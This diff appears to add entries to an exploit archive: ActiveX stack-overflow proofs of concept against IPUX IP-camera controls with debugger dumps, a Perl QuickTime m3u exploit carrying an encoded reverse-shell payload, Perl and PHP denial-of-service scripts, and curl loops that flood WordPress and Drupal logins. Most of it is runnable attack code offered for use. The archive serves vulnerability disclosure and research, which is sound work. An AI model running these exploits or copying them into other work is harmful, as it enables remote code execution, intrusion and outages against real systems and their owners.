 Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
 Product web page: http://www.ipux.net | http://www.fitivision.com
 Affected version: Bullet Type ICL5132 (firmware: ICL5132 2.0.0-2 20130730 r1112)
                  Bullet Type ICL5452
 Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
 With high performance H.264 video compression, the file size of video stream is
 extremely reduced, as to optimize the network bandwidth efficiency. It has full
 Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
 built-in USB port provides a convenient and portable storage option for local storage
 of event and schedule recording, especially network disconnected.
 Desc: The UltraSVCam ActiveX Control 'UltraSVCamX.ocx' suffers from a stack buffer
 overflow vulnerability when parsing large amount of bytes to several functions in
 UltraSVCamLib, resulting in memory corruption overwriting several registers including
 the SEH. An attacker can gain access to the system of the affected node and execute
 arbitrary code.
 ----------------------------------------------------------------------------------
 (3ef0.3e0c): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraSVCamX.ocx - 
 eax=41414149 ebx=00000001 ecx=00003e0c edx=02163f74 esi=41414141 edi=02163f74
 eip=77e8466c esp=003eef8c ebp=003eefc0 iopl=0         nv up ei pl zr na pe nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 ntdll!RtlDeleteCriticalSection+0x77:
 77e8466c 833800          cmp     dword ptr [eax],0    ds:002b:41414149=????????
 ----------------------------------------------------------------------------------
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 Advisory ID: ZSL-2014-5213
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5213.php
 16.11.2014
 ---
 Properties:
 -----------
 FileDescription		UltraSVCam ActiveX Control
 FileVersion		1, 0, 53, 34 and 1, 0, 53, 33
 InternalName		UltraSVCamX
 OriginalFileName	UltraSVCamX.ocx
 ProductName		UltraSVCam device ActiveX Control
 ProductVersion		1, 0, 53, 34 and 1, 0, 53, 33
 List of members:
 ----------------
 Interface IUltraSVCamX : IDispatch
 Default Interface: True
 Members : 51
 	RemoteHost
 	RemotePort
 	AccountCode
 	Password
 	UserName
 	fChgImageSize
 	ImgWidth
 	ImgHeight
 	SnapFileName
 	AVIRecStart
 	SetImgScale
 	OpenFolder
 	OpenFileDlg
 	TriggerStatus
 	AVIRecStatus
 	PlayVideo
 	SetAutoScale
 	SetPTUserAllow
 	SetLanguage
 	SetFullScreen
 	SetZoom
 	SetDirectShow
 	SetROIParam
 	FOpen
 	FSeek
 	FDeleteFile
 Vulnerable members of the class:
 --------------------------------
 RemoteHost
 AccountCode
 SnapFileName
 OpenFolder
 PoC(s):
 -------
 ---1
 <html>
 <object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
 prototype  = "Property Let RemoteHost As String"
 memberName = "RemoteHost"
 progid     = "UltraSVCamLib.UltraSVCamX"
 argCount   = 1
 arg1=String(11284, "A")
 target.RemoteHost = arg1
 </script>
 </html>
 ---2
 <html>
 <object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
 prototype  = "Property Let AccountCode As String"
 memberName = "AccountCode"
 progid     = "UltraSVCamLib.UltraSVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.AccountCode = arg1
 </script>
 </html>
 ---3
 <html>
 <object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
 prototype  = "Property Let SnapFileName As String"
 memberName = "SnapFileName"
 progid     = "UltraSVCamLib.UltraSVCamX"
 argCount   = 1
 arg1=String(11284, "A")
 target.SnapFileName = arg1
 </script>
 </html>
 ---4
 <html>
 <object classid='clsid:33AD836E-B04E-4114-B39F-AB77AAA08487' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraSVCamX.ocx"
 prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
 memberName = "OpenFolder"
 progid     = "UltraSVCamLib.UltraSVCamX"
 argCount   = 1
 arg1=String(2068, "A")
 target.OpenFolder arg1 
 </script>
 </html>
--- a/platforms/hardware/webapps/35422.txt
+++ b/platforms/hardware/webapps/35422.txt
@ -0,0 +1,314 @@
 ?
 IPUX CS7522/CS2330/CS2030 IP Camera (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow
 Vendor: Big Good Holdings Limited | Fitivision Technology Inc.
 Product web page: http://www.ipux.net | http://www.fitivision.com
 Affected version: PT Type ICS2330 (firmware: ICS2330 1.1.0-29 20140120 r4296)
                  Cube Type ICS2030 (firmware: ICS2030 1.1.0-21 20130223 r3967)
                  Dome Type ICS7522 (firmware: ICS7522 1.1.0-7 20120413 r3812)
 Summary: The device is H.264 Wired/Wireless IP Camera with 1.3 Mega-pixel sensor.
 With high performance H.264 video compression, the file size of video stream is
 extremely reduced, as to optimize the network bandwidth efficiency. It has full
 Pan/Tilt function and 3X digital zoom feature for a larger space monitoring. The
 built-in USB port provides a convenient and portable storage option for local storage
 of event and schedule recording, especially network disconnected.
 Desc: The UltraHVCam ActiveX Control 'UltraHVCamX.ocx' suffers from a stack buffer
 overflow vulnerability when parsing large amount of bytes to several functions in
 UltraHVCamLib, resulting in memory corruption overwriting several registers including
 the SEH. An attacker can gain access to the system of the affected node and execute
 arbitrary code.
 ----------------------------------------------------------------------------------
 (4b24.478c): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\Downloaded Program Files\UltraHVCamX.ocx - 
 eax=02d04d4f ebx=001dc890 ecx=41414141 edx=41414141 esi=001d6d6c edi=00000009
 eip=10032459 esp=0030efe8 ebp=0030efec iopl=0         nv up ei pl nz na pe nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
 UltraHVCamX!DllUnregisterServer+0x100e9:
 10032459 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
 0:000> d ecx
 41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
 0:000> d eax
 02d04d4f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04d5f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04d6f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04d7f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04d8f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04d9f  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04daf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 02d04dbf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
 ----------------------------------------------------------------------------------
 Tested on: Microsoft Windows 7 Professional SP1 (EN)
 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 Advisory ID: ZSL-2014-5212
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5212.php
 16.11.2014
 ---
 Properties:
 -----------
 FileDescription		UltraHVCam ActiveX Control
 FileVersion		1, 0, 52, 55 and 1, 0, 52, 54
 InternalName		UltraHVCamX
 OriginalFileName	UltraHVCamX.ocx
 ProductName		UltraHVCam device ActiveX Control
 ProductVersion		1, 0, 52, 55 and 1, 0, 52, 54
 List of members:
 ----------------
 Interface IUltraHVCamX : IDispatch
 Default Interface: True
 Members : 66
 	RemoteHost
 	RemotePort
 	AccountCode
 	GetConfigValue
 	SetConfigValue
 	SetCGIAPNAME
 	Password
 	UserName
 	fChgImageSize
 	ImgWidth
 	ImgHeight
 	SnapFileName
 	AVIRecStart
 	SetImgScale
 	OpenFolder
 	OpenFileDlg
 	TriggerStatus
 	AVIRecStatus
 	Event_Frame
 	PlayVideo
 	SetAutoScale
 	Event_Signal
 	WavPlay
 	CGI_ParamGet
 	CGI_ParamSet
 	MulticastEnable
 	MulticastStatus
 	SetPTUserAllow
 	SetLanguage
 	SetZoomButtonFontColor
 	SetZoomButtonColor
 	SetFullScreen
 Vulnerable members of the class:
 --------------------------------
 RemoteHost
 AccountCode
 SetCGIAPNAME
 Password
 UserName
 SnapFileName
 OpenFolder
 CGI_ParamGet
 CGI_ParamSet
 MulticastEnable
 PoC(s):
 -------
 ---1
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Function MulticastEnable ( ByVal sIP As String ,  ByVal lPort As Long ) As Long"
 memberName = "MulticastEnable"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 2
 arg1=String(13332, "A")
 arg2=1
 target.MulticastEnable arg1 ,arg2 
 </script>
 </html>
 ---2
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let RemoteHost As String"
 memberName = "RemoteHost"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(2068, "A")
 target.RemoteHost = arg1
 </script>
 </html>
 ---3
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let AccountCode As String"
 memberName = "AccountCode"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.AccountCode = arg1
 </script>
 </html>
 ---4
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let SetCGIAPNAME As String"
 memberName = "SetCGIAPNAME"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.SetCGIAPNAME = arg1
 </script>
 </html>
 ---5
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let Password As String"
 memberName = "Password"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.Password = arg1
 </script>
 </html>
 ---6
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let UserName As String"
 memberName = "UserName"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.UserName = arg1
 </script>
 </html>
 ---7
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Property Let SnapFileName As String"
 memberName = "SnapFileName"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.SnapFileName = arg1
 </script>
 </html>
 ---8
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Function OpenFolder ( ByVal sInitPath As String ) As String"
 memberName = "OpenFolder"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 1
 arg1=String(1044, "A")
 target.OpenFolder arg1 
 </script>
 </html>
 ---9
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Function CGI_ParamGet ( ByVal sGroup As String ,  ByVal sName As String ) As String"
 memberName = "CGI_ParamGet"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 2
 arg1=String(1044, "A")
 arg2="defaultV"
 target.CGI_ParamGet arg1 ,arg2 
 </script>
 </html>
 ---10
 <html>
 <object classid='clsid:9920E6A5-9B38-4C45-AD2D-5D1AA2B00A6E' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Windows\Downloaded Program Files\UltraHVCamX.ocx"
 prototype  = "Function CGI_ParamSet ( ByVal sGroup As String ,  ByVal sName As String ,  ByVal SVal As String ) As Long"
 memberName = "CGI_ParamSet"
 progid     = "UltraHVCamLib.UltraHVCamX"
 argCount   = 3
 arg1=String(1044, "A")
 arg2="defaultV"
 arg3="defaultV"
 target.CGI_ParamSet arg1 ,arg2 ,arg3 
 </script>
 </html>
--- a/platforms/multiple/dos/35437.pl
+++ b/platforms/multiple/dos/35437.pl
@ -0,0 +1,29 @@
 source: http://www.securityfocus.com/bid/46827/info
 Air Contacts Lite is prone a denial-of-service vulnerability.
 Successful exploits may allow an attacker to crash the affected application, resulting in a denial-of-service condition. 
 #!/usr/bin/perl
 use IO::Socket;
      if (@ARGV < 1) {
              usage();
      }
      $ip     = $ARGV[0];
      $port   = $ARGV[1];
      print "[+] Sending request...\n";
      $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
 "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
      print $socket "GET http://www.example.com. HTTP/1.1\r\n";
      print $socket "Host: http://www.example.com.\r\n";
      print $socket "Content-Length: 0\x78\x41\x71\x69\r\n\r\n";
      sleep(2);
      close($socket);
      print "[+] Done!\n";
 sub usage() {
      print "[-] example - Air Contacts Lite (DoS)\n\n";
      print "[-] Usage: <". $0 ."> <host> <port>\n";
      print "[-] Example: ". $0 ." 127.0.0.1 80\n";
      exit;
 }
--- a/platforms/osx/remote/35433.pl
+++ b/platforms/osx/remote/35433.pl
@ -0,0 +1,118 @@
 source: http://www.securityfocus.com/bid/46799/info
 Apple QuickTime is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
 QuickTime 7.5.x is vulnerable; other versions may also be affected. 
 #!/usr/bin/perl
 ###
 # Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow
 # Author : KedAns-Dz
 # E-mail : ked-h@hotmail.com
 # Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
 # Twitter page : twitter.com/kedans
 # platform : Windows
 # Impact : Remote Access and BOF
 # Tested on : Windows XP SP3 Français 
 # Target :  QuickTime Player v 7.5.x
 ###
 # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
 # ------------
 #START SYSTEM /root@MSdos/ : 
 system("title KedAns-Dz");
 system("color 1e");
 system("cls");
 print "\n\n";
 print "    |===========================================================|\n";
 print "    |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc.  =|\n";
 print "    |= [!] Exploit : Stack Buffer Overflow                     =|\n";
 print "    |= [!] Author : KedAns-Dz                                  =|\n";
 print "    |= [!] Mail: Ked-h(at)hotmail(dot)com                      =|\n";
 print "    |===========================================================|\n";
 sleep(2);
 print "\n";
 print " [!] Please Wait Loading...\n";
 # Payload Parameter (http://www.metasploit.com) 
 # windows/shell_reverse_tcp - 739 bytes
 # Encoder: x86/alpha_mixed
 # LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
 my $payload = 
 "\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
 "\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
 "\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
 "\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
 "\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
 "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
 "\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
 "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
 "\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
 "\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
 "\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
 "\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
 "\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
 "\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
 "\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
 "\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
 "\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
 "\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
 "\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
 "\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
 "\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
 "\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
 "\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
 "\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
 "\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
 "\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
 "\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
 "\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
 "\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
 "\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
 "\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
 "\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
 "\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
 "\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
 "\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
 "\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
 "\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
 "\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
 "\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
 "\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
 "\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
 "\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
 "\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
 "\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
 "\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
 "\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
 "\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
 "\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
 "\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
 "\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
 "\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
 "\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
 "\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41"; #_ End Payload _
 # Parameter OverFlow => 
 my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll
 my $usmh = "\x90" x (50 - length($eip)); # Pack Length x 50
 my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll
 $junk = "\x41" x 333 ; # Junk
 # immiXing Parameters >>>
 $kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns
 # >> Creating ... 
 open (FILE ,"> Bo0M.m3u");
 print FILE $kedans ;
 print "\nFile successfully created!\n" or die print "\n OpsS! File is Not Created !! ";
 close (FILE);
 #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
 # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
 # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
 # > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
 # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
 # 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
 # sec4ever.com members Dz : =>>
 #  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
 # hotturks.org : TeX * KadaVra ... all Others
 # Kelvin.Xgr ( kelvinx.net)
 #===========================================================================
--- a/platforms/php/webapps/35413.php
+++ b/platforms/php/webapps/35413.php
@ -0,0 +1,67 @@
 <?php
 echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
 echo "Proof-of-Concept developed by john@secureli.com (http://secureli.com)\n\n";
 echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
 echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";
 echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];
 do {
 $multi = curl_multi_init();
 $channels = array();
 for ($x = 0; $x < $argv[3]; $x++) {
 	$ch = curl_init();
 	$postData = array(
 		'log' => $argv[2],
 		'pwd' => str_repeat("A",1000000),
 		'redirect_to' => $argv[1] . "/wp-admin/",
 		'reauth' => 1,
 		'testcookie' => '1',
 		'wp-submit' => "Log%20In");
 	$cookieFiles = "cookie.txt";
 	curl_setopt_array($ch, array(
 	    CURLOPT_HEADER => 1,
 	    CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
 	    CURLOPT_REFERER => $argv[1] . "/wp-admin/",
 	    CURLOPT_COOKIEJAR => $cookieFiles,
 	    CURLOPT_COOKIESESSION => true,
 	    CURLOPT_URL => $argv[1] . '/wp-login.php',
 	    CURLOPT_RETURNTRANSFER => true,
 	    CURLOPT_POST => true,
 	    CURLOPT_POSTFIELDS => $postData,
 	    CURLOPT_FOLLOWLOCATION => true));
    curl_multi_add_handle($multi, $ch);
    $channels[$x] = $ch;
 }
 $active = null;
 do {
 	$mrc = curl_multi_exec($multi, $active);
 } while ($mrc == CURLM_CALL_MULTI_PERFORM);
 while ($active && $mrc == CURLM_OK) {
    do {
        $mrc = curl_multi_exec($multi, $active);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
 }
 foreach ($channels as $channel) {
    curl_multi_remove_handle($multi, $channel);
 }
 curl_multi_close($multi);
 echo ".";
 } while (1==1);
 ?>
--- a/platforms/php/webapps/35414.txt
+++ b/platforms/php/webapps/35414.txt
@ -0,0 +1,51 @@
 ====================================================================
 DESCRIPTION:
 ====================================================================
 A vulnerability present in Wordpress < 4.0.1 allows an
 attacker to send specially crafted requests resulting in CPU and memory
 exhaustion. This may lead to the site becoming unavailable or
 unresponsive (denial of service).
 ====================================================================
 Time Line:
 ====================================================================
 November 20, 2014 - A Wordpress security update and the security
 advisory is published.
 ====================================================================
 Proof of Concept:
 ====================================================================
 Generate a pyaload and try with a valid user:
 echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
 {1..1000000} >> valid_user_payload && echo -n "&op=Log
 in&form_id=user_login" >> valid_user_payload
 Perform a Dos with a valid user:
 for i in `seq 1 150`; do (curl --data @valid_user_payload
 http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done
 ====================================================================
 Authors:
 ====================================================================
 -- Javer Nieto -- http://www.behindthefirewalls.com
 -- Andres Rojas -- http://www.devconsole.info
 ====================================================================
 References:
 ====================================================================
 * https://wordpress.org/news/2014/11/wordpress-4-0-1/
 * https://www.drupal.org/SA-CORE-2014-006
 *
 http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
 *
 http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
 * http://www.devconsole.info/?p=1050
--- a/platforms/php/webapps/35415.txt
+++ b/platforms/php/webapps/35415.txt
@ -0,0 +1,53 @@
 ====================================================================
 DESCRIPTION:
 ====================================================================
 A vulnerability present in Drupal < 7.34 allows an attacker to send
 specially crafted requests resulting in CPU and memory exhaustion. This
 may lead to the site becoming unavailable or unresponsive (denial of
 service).
 ====================================================================
 Time Line:
 ====================================================================
 November 19, 2014 - A Drupal security update and the security advisory
 is published.
 ====================================================================
 Proof of Concept:
 ====================================================================
 Generate a pyaload and try with a valid user:
 echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
 {1..1000000} >> valid_user_payload && echo -n "&op=Log
 in&form_id=user_login" >> valid_user_payload
 Perform a Dos with a valid user:
 for i in `seq 1 150`; do (curl --data @valid_user_payload
 http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
 ====================================================================
 Authors:
 ====================================================================
 -- Javer Nieto -- http://www.behindthefirewalls.com
 -- Andres Rojas -- http://www.devconsole.info
 ====================================================================
 References:
 ====================================================================
 * https://wordpress.org/news/2014/11/wordpress-4-0-1/
 * https://www.drupal.org/SA-CORE-2014-006
 *
 http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
 *
 http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
 * http://www.devconsole.info/?p=1050
--- a/platforms/php/webapps/35416.txt
+++ b/platforms/php/webapps/35416.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/46771/info
 Interleave is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
 Interleave 5.5.0.2 is vulnerable; other versions may also be affected.
